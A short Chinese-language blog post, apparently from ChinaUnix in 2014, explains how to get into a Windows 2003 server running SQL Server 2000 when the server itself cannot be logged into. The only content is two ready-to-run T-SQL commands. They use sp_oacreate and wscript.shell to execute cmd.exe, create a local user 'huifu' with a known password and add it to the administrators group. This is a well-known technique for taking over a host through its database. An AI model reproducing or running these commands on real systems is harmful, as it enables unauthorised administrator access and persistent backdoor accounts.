Chinaunix首页 | 论坛 | 博客
  • 博客访问: 585277
  • 博文数量: 94
  • 博客积分: 1452
  • 博客等级: 上尉
  • 技术积分: 982
  • 用 户 组: 普通用户
  • 注册时间: 2010-05-06 15:38
文章分类

全部博文(94)

文章存档

2018年(3)

2014年(26)

2013年(11)

2012年(3)

2011年(43)

2010年(8)

分类: SQLServer

2014-06-04 14:33:05

环境: windows 2003
数据库: sqlserver2000
前提:能访问无法登陆的服务器数据库,
登陆上另外一台服务器,查询分析器操作:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user huifu huifu /add' 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators huifu /add' 

蓝色为用户名 红色为密码

阅读(1047) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~